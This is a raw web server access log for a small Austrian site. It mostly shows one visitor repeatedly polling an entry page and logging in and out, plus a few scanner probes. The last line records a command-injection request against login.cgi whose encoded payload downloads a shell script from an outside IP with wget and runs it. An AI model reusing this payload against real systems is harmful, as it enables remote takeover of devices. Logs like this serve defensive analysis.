77.119.161.159 - - [30/Apr/2025:17:39:52 +0200] "GET /entry.php?id=10271&&ser=27531 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27470" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:39:52 +0200] "GET /gui/javascript/form_form.js?1746027592 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27531" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:40:02 +0200] "GET /entry.php?id=10271&&ser=27541 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:40:02 +0200] "GET /gui/javascript/form_form.js?1746027602 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27541" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
20.171.29.237 - - [30/Apr/2025:17:40:52 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
77.119.161.159 - - [30/Apr/2025:17:40:53 +0200] "GET /entry.php?id=10271&&ser=27592 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27531" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:40:53 +0200] "GET /gui/javascript/form_form.js?1746027653 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:41:02 +0200] "GET /entry.php?id=10271&&ser=27602 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27541" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:41:03 +0200] "GET /gui/javascript/form_form.js?1746027662 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:41:54 +0200] "GET /entry.php?id=10271&&ser=27653 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:41:54 +0200] "GET /gui/javascript/form_form.js?1746027714 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27653" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:42:03 +0200] "GET /entry.php?id=10271&&ser=27662 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:42:03 +0200] "GET /gui/javascript/form_form.js?1746027723 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:42:55 +0200] "GET /entry.php?id=10271&&ser=27714 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27653" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:42:55 +0200] "GET /gui/javascript/form_form.js?1746027775 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27714" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:43:03 +0200] "GET /entry.php?id=10271&&ser=27723 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:43:03 +0200] "GET /gui/javascript/form_form.js?1746027783 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27723" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:43:56 +0200] "GET /entry.php?id=10271&&ser=27775 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27714" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:43:56 +0200] "GET /gui/javascript/form_form.js?1746027836 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27775" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:44:03 +0200] "GET /entry.php?id=10271&&ser=27783 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27723" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:44:03 +0200] "GET /gui/javascript/form_form.js?1746027843 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27783" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:44:57 +0200] "GET /entry.php?id=10271&&ser=27836 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27775" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:44:57 +0200] "GET /gui/javascript/form_form.js?1746027897 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27836" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:45:04 +0200] "GET /entry.php?id=10271&&ser=27843 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27783" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:45:04 +0200] "GET /gui/javascript/form_form.js?1746027904 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27843" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:45:58 +0200] "GET /entry.php?id=10271&&ser=27897 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=27836" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:45:58 +0200] "GET /gui/javascript/form_form.js?1746027958 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27897" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:46:04 +0200] "GET /entry.php?id=10271&&ser=27904 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27843" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:46:04 +0200] "GET /gui/javascript/form_form.js?1746027964 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27904" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:46:59 +0200] "GET /entry.php?id=10271&&ser=27958 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27897" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:46:59 +0200] "GET /gui/javascript/form_form.js?1746028019 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27958" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:47:04 +0200] "GET /entry.php?id=10271&&ser=27964 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27904" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:47:04 +0200] "GET /gui/javascript/form_form.js?1746028024 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=27964" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:48:00 +0200] "GET /entry.php?id=10271&&ser=28019 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27958" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:48:00 +0200] "GET /gui/javascript/form_form.js?1746028080 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28019" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:48:05 +0200] "GET /entry.php?id=10271&&ser=28024 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=27964" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:48:05 +0200] "GET /gui/javascript/form_form.js?1746028085 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28024" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
154.81.156.54 - - [30/Apr/2025:17:48:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.119.161.159 - - [30/Apr/2025:17:49:01 +0200] "GET /entry.php?id=10271&&ser=28080 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=28019" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:49:01 +0200] "GET /gui/javascript/form_form.js?1746028141 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28080" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:49:06 +0200] "GET /entry.php?id=10271&&ser=28085 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28024" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:49:06 +0200] "GET /gui/javascript/form_form.js?1746028146 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28085" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:50:02 +0200] "GET /entry.php?id=10271&&ser=28141 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28080" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:50:02 +0200] "GET /gui/javascript/form_form.js?1746028202 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:50:06 +0200] "GET /entry.php?id=10271&&ser=28146 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=28085" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:50:06 +0200] "GET /gui/javascript/form_form.js?1746028206 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28146" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:51:03 +0200] "GET /entry.php?id=10271&&ser=28202 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:51:03 +0200] "GET /gui/javascript/form_form.js?1746028263 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28202" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:51:06 +0200] "GET /entry.php?id=10271&&ser=28206 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28146" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:51:07 +0200] "GET /gui/javascript/form_form.js?1746028266 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
154.81.156.35 - - [30/Apr/2025:17:51:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.119.161.159 - - [30/Apr/2025:17:52:04 +0200] "GET /entry.php?id=10271&&ser=28263 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28202" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:52:04 +0200] "GET /gui/javascript/form_form.js?1746028324 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28263" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:52:07 +0200] "GET /entry.php?id=10271&&ser=28266 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:52:07 +0200] "GET /gui/javascript/form_form.js?1746028327 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:53:05 +0200] "GET /entry.php?id=10271&&ser=28324 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28263" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:53:05 +0200] "GET /gui/javascript/form_form.js?1746028385 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28324" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:53:07 +0200] "GET /entry.php?id=10271&&ser=28327 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:53:07 +0200] "GET /gui/javascript/form_form.js?1746028387 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28327" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:54:06 +0200] "GET /entry.php?id=10271&&ser=28385 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28324" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:06 +0200] "GET /gui/javascript/form_form.js?1746028446 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28385" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:07 +0200] "GET /entry.php?id=10271&&ser=28387 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=28327" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:54:07 +0200] "GET /gui/javascript/form_form.js?1746028447 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28387" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:54:25 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1877 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:25 +0200] "GET /gui/javascript/form_form.js?1746028465 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:27 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:27 +0200] "GET /gui/javascript/form_form.js?1746028467 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:27 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:54:27 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1912 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [30/Apr/2025:17:55:08 +0200] "GET /entry.php?id=10271&&ser=28447 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28387" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:55:08 +0200] "GET /gui/javascript/form_form.js?1746028508 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:56:08 +0200] "GET /entry.php?id=10271&&ser=28508 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:56:08 +0200] "GET /gui/javascript/form_form.js?1746028568 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28508" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:57:08 +0200] "GET /entry.php?id=10271&&ser=28568 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28508" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:57:08 +0200] "GET /gui/javascript/form_form.js?1746028628 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28568" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:58:09 +0200] "GET /entry.php?id=10271&&ser=28628 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28568" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:58:09 +0200] "GET /gui/javascript/form_form.js?1746028689 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28628" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:59:09 +0200] "GET /entry.php?id=10271&&ser=28689 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28628" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:17:59:09 +0200] "GET /gui/javascript/form_form.js?1746028749 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28689" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:00:09 +0200] "GET /entry.php?id=10271&&ser=28749 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28689" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:00:09 +0200] "GET /gui/javascript/form_form.js?1746028809 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28749" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:01:10 +0200] "GET /entry.php?id=10271&&ser=28809 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28749" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:01:10 +0200] "GET /gui/javascript/form_form.js?1746028870 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:02:10 +0200] "GET /entry.php?id=10271&&ser=28870 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:02:10 +0200] "GET /gui/javascript/form_form.js?1746028930 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28870" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:03:10 +0200] "GET /entry.php?id=10271&&ser=28930 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28870" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:03:10 +0200] "GET /gui/javascript/form_form.js?1746028990 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:04:11 +0200] "GET /entry.php?id=10271&&ser=28990 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=28930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:04:11 +0200] "GET /gui/javascript/form_form.js?1746029051 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=28990" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:05:06 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1878 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:05:06 +0200] "GET /gui/javascript/form_form.js?1746029106 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:05:09 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:05:09 +0200] "GET /gui/javascript/form_form.js?1746029109 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:05:09 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1911 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [30/Apr/2025:18:05:09 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
47.121.133.117 - - [30/Apr/2025:18:16:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
